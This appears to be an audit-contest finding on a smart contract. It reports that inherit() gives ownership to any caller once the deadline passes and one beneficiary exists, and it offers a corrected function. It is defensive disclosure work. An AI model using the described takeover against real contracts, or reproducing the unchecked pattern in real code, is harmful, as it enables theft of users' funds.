Submission Details
Severity:
Unauthorized Ownership Takeover in inherit() Function
Summary
The inherit() function in the contract allows anyone to become the new owner if there is exactly one beneficiary and the inactivity deadline has passed. This occurs due to the lack of a validation check on msg.sender, allowing unauthorized users to take control of the contract.
Vulnerability Details
if (beneficiaries.length == 1) {
owner = msg.sender; // No validation of msg.sender
_setDeadline();
}
If beneficiaries.length == 1, the contract blindly assigns msg.sender as the new owner. No validation ensures that msg.sender is actually the intended beneficiary. As a result, anyone can call inherit() and take ownership of the contract.
Impact
• Unauthorized takeover: Any external actor can claim ownership of the contract after the deadline, even if they are not a beneficiary.
• Loss of control: The rightful beneficiary may lose access to the funds or contract functionality.
• Potential fund theft: If the contract manages assets, an attacker could drain them.
Tools Used
Manual review
Recommendations
function inherit() external {
if (block.timestamp < getDeadline()) {
revert InactivityPeriodNotLongEnough();
}
if (beneficiaries.length == 1) {
if (msg.sender != beneficiaries[0]) {
revert NotAuthorizedBeneficiary();
}
owner = msg.sender;
_setDeadline();
} else if (beneficiaries.length > 1) {
isInherited = true;
} else {
revert InvalidBeneficiaries();
}
}
Updates
Lead Judging Commences
0xtimefliez 9 months ago
Submission Judgement Published Assigned finding tags:
Inherit depends on msg.sender so anyone can claim the contract
Rewards breakdown
nSLOC
211This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.